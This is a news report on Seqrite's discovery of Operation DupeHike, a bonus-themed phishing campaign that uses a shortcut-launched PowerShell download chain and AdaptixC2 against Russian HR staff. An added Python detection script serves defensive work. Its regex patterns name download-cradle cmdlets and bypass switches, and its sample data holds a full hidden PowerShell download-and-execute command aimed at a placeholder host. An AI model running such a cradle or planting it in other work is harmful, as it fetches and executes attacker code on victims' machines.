
Seqrite Uncovers Operation DupeHike Cyber Campaign

The attack begins with a seemingly legitimate message referencing a 15 per cent performance-based bonus, a familiar and trusted topic for HR and payroll staff

Seqrite, the enterprise cybersecurity arm of Quick Heal Technologies Limited, has uncovered a sophisticated cyber-espionage campaign targeting Russian corporate organisations. The campaign, dubbed Operation DupeHike, specifically targets human resources, payroll, and internal administrative departments, exploiting routine workplace communications to gain covert access to enterprise systems.

According to Seqrite, the threat actors behind the campaign, tracked as the UNG0902 group, distributed phishing emails masquerading as official communications about employee bonuses. The emails carried ZIP attachments titled “Bonus 2025” containing a Windows shortcut (.lnk) file dressed up to look like a PDF document of annual bonus details. Once the shortcut is opened, it starts a covert infection chain that lets the attackers spy on and remotely control the compromised machine.

The attack begins with a seemingly legitimate message referencing a 15 per cent performance-based bonus, a familiar and trusted topic for HR and payroll staff. When the attachment is opened, the shortcut silently runs a hidden PowerShell command that downloads the first-stage malware from a remote server under the attackers’ control. That payload then retrieves a second component disguised as a font file. The malware injects itself into legitimate processes such as Notepad or Microsoft Edge to evade detection before deploying AdaptixC2, an open-source command-and-control framework the attackers use to monitor activity, exfiltrate data, and execute commands on infected systems.

Seqrite’s Advanced Persistent Threat (APT) research team at Seqrite Labs, India’s largest malware analysis facility, detected the campaign on 21 November 2025. Investigations revealed that the malicious infrastructure was hosted on servers linked to Russian hosting providers. Researchers also observed the attackers adapting their techniques during the campaign, initially relying on plainly exposed network ports before shifting to encrypted communication channels to avoid detection.

Security experts warn that the campaign is particularly dangerous because it leverages trusted internal workflows and targets departments that handle sensitive financial and personal information. “Operation DupeHike demonstrates how everyday business communications can be weaponised to bypass traditional security controls,” Seqrite researchers noted.

In response, Seqrite has deployed protection across its security portfolio, blocking all known components of the attack chain. The company advises enterprises to reinforce employee awareness, urging staff to verify unexpected attachments, even those that appear to come from internal departments such as HR, through official channels before opening them. Additional recommendations include enabling multi-factor authentication, restricting user privileges to the minimum each role needs, and deploying security tools capable of detecting anomalous PowerShell activity and unsigned code execution.
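The two detection opportunities in the chain described above, a shortcut launching a hidden PowerShell download cradle and a normally network-silent process (Notepad) opening an outbound connection after injection, can be expressed as simple rules over endpoint telemetry. The following is an added example written for this page, not Seqrite’s detection content. It assumes Sysmon-style process-creation and network-connection events, and every sample value (paths, switches, the example.invalid host and the 203.0.113.0/24 addresses) is constructed for illustration, not an indicator from the campaign.

```python
"""
Heuristic detection for an LNK -> hidden PowerShell -> download cradle chain,
plus a network-silent process beaconing after injection.  Added example;
event shapes mimic Sysmon EID 1 (process create) and EID 3 (network connect).
All sample data below is constructed and is not a campaign indicator.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple, Union

POWERSHELL = {"powershell.exe", "pwsh.exe"}

# What launches a .lnk target: Explorer on double-click, or an archiver
# opening the ZIP in place.  Assumed list; extend it for your own estate.
SHORTCUT_LAUNCHERS = {"explorer.exe", "winrar.exe", "7zfm.exe"}

# Processes that should never open outbound connections on a workstation.
# Edge is deliberately absent: a browser talking to the internet is normal,
# so injection into it needs other telemetry (e.g. unbacked memory regions).
NETWORK_SILENT = {"notepad.exe", "calc.exe", "mspaint.exe"}

# Switches used to hide the console or skip policy/profile checks.
HIDDEN_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass"
    r"|nop(?:rofile)?|noni(?:nteractive)?|e(?:nc|ncodedcommand)?)(?=\s|$)"
)

# Download-and-execute primitives typical of a first-stage cradle.
CRADLE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|DownloadData"
    r"|Invoke-WebRequest|iwr|Net\.WebClient|Start-BitsTransfer|Invoke-RestMethod|irm)\b"
)


@dataclass
class ProcessEvent:           # subset of Sysmon EID 1 fields
    image: str
    parent_image: str
    command_line: str


@dataclass
class NetworkEvent:           # subset of Sysmon EID 3 fields
    image: str
    dest_ip: str
    dest_port: int


Event = Union[ProcessEvent, NetworkEvent]
ALERT_THRESHOLD = 2           # one weak signal alone is not worth an alert


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Score a process-creation event; each matched heuristic adds a reason."""
    if basename(ev.image) not in POWERSHELL:
        return 0, []
    reasons = []
    if basename(ev.parent_image) in SHORTCUT_LAUNCHERS:
        reasons.append("powershell spawned by a shortcut launcher (explorer/archiver)")
    if HIDDEN_FLAGS.search(ev.command_line):
        reasons.append("hidden-window / policy-bypass switches")
    if CRADLE.search(ev.command_line):
        reasons.append("download cradle in command line")
    return len(reasons), reasons


def check_network(ev: NetworkEvent) -> Tuple[int, List[str]]:
    """A normally network-silent binary making an outbound connection."""
    name = basename(ev.image)
    if name in NETWORK_SILENT:
        return 2, [f"{name} connected to {ev.dest_ip}:{ev.dest_port}"]
    return 0, []


def detect(events: List[Event]) -> List[Tuple[Event, List[str]]]:
    """Return (event, reasons) for every event scoring at least ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        score, reasons = (check_process(ev) if isinstance(ev, ProcessEvent)
                          else check_network(ev))
        if score >= ALERT_THRESHOLD:
            alerts.append((ev, reasons))
    return alerts


# Constructed sample telemetry (not campaign IOCs).
SAMPLE_EVENTS: List[Event] = [
    # Routine admin script from a scheduled task: one weak signal, no alert.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    # What a bonus-themed shortcut would look like when double-clicked.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
                 ".DownloadString('http://example.invalid/stage1.txt')\""),
    # Browser traffic is normal and must not alert.
    NetworkEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 "203.0.113.20", 443),
    # Notepad never needs the network: the injected stage beaconing out.
    NetworkEvent(r"C:\Windows\System32\notepad.exe", "203.0.113.10", 443),
]


if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(basename(ev.image), "->", "; ".join(reasons))
```

Run as a script it prints two alerts, one for the Explorer-spawned hidden PowerShell cradle (all three process heuristics fire) and one for Notepad connecting outbound; the scheduled-task script and the Edge connection stay silent. The threshold is the practitioner’s caveat: `-NoProfile` or a download cmdlet on its own is common in legitimate automation, so the rule only fires when a shortcut-launcher parent, a hidden window, or a cradle are combined.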

Seqrite stated that it continues to actively monitor Operation DupeHike and is sharing updated indicators of compromise with enterprise customers and law enforcement agencies. These efforts aim to disrupt the attackers’ infrastructure and strengthen organisational defences against similar espionage-driven campaigns in the future.
